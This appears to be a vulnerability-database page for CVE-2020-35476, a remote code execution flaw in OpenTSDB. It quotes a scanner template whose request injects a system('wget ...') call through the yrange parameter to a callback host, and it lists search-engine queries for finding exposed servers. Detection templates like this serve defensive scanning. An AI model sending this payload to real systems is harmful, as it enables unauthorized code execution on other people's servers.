CVE-2020-35476: OpenTSDB <=2.4.0 - Remote Code Execution

日期: 2025-08-01 | 影响软件: OpenTSDB | POC: 已公开

漏洞描述

OpenTSDB 2.4.0 and earlier is susceptible to remote code execution via the yrange parameter written to a gnuplot file in the /tmp directory. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.

PoC代码[已公开]

id: CVE-2020-35476

info:
  name: OpenTSDB <=2.4.0 - Remote Code Execution
  author: pikpikcu
  severity: critical
  description: |
    OpenTSDB 2.4.0 and earlier is susceptible to remote code execution via the yrange parameter written to a gnuplot file in the /tmp directory. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
  remediation: |
    Upgrade OpenTSDB to a version higher than 2.4.0 to mitigate this vulnerability.
  reference:
    - https://github.com/OpenTSDB/opentsdb/issues/2051
    - http://packetstormsecurity.com/files/170331/OpenTSDB-2.4.0-Command-Injection.html
    - https://nvd.nist.gov/vuln/detail/CVE-2020-35476
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-35476
    cwe-id: CWE-78
    epss-score: 0.9348
    epss-percentile: 0.99821
    cpe: cpe:2.3:a:opentsdb:opentsdb:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: opentsdb
    product: opentsdb
    shodan-query:
      - html:"OpenTSDB"
      - http.html:"opentsdb"
    fofa-query: body="opentsdb"
  tags: cve,cve2020,opentsdb,rce,packetstorm

http:
  - method: GET
    path:
      - "{{BaseURL}}/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system(%27wget%20http://{{interactsh-url}}%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - plotted
          - timing
          - cachehit
        condition: and

      - type: word
        part: header
        words:
          - application/json

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100adfad4bd47c9576794e19ce32a8e78bf503bf9f2a7c4687ef2cfe867d51480e602202a376ef780f00bd5962053969a18eb031e0dc228f7d65e6bd8a37a134f89b6a2:922c64590222798bb761d5b6d8e72950

相关漏洞推荐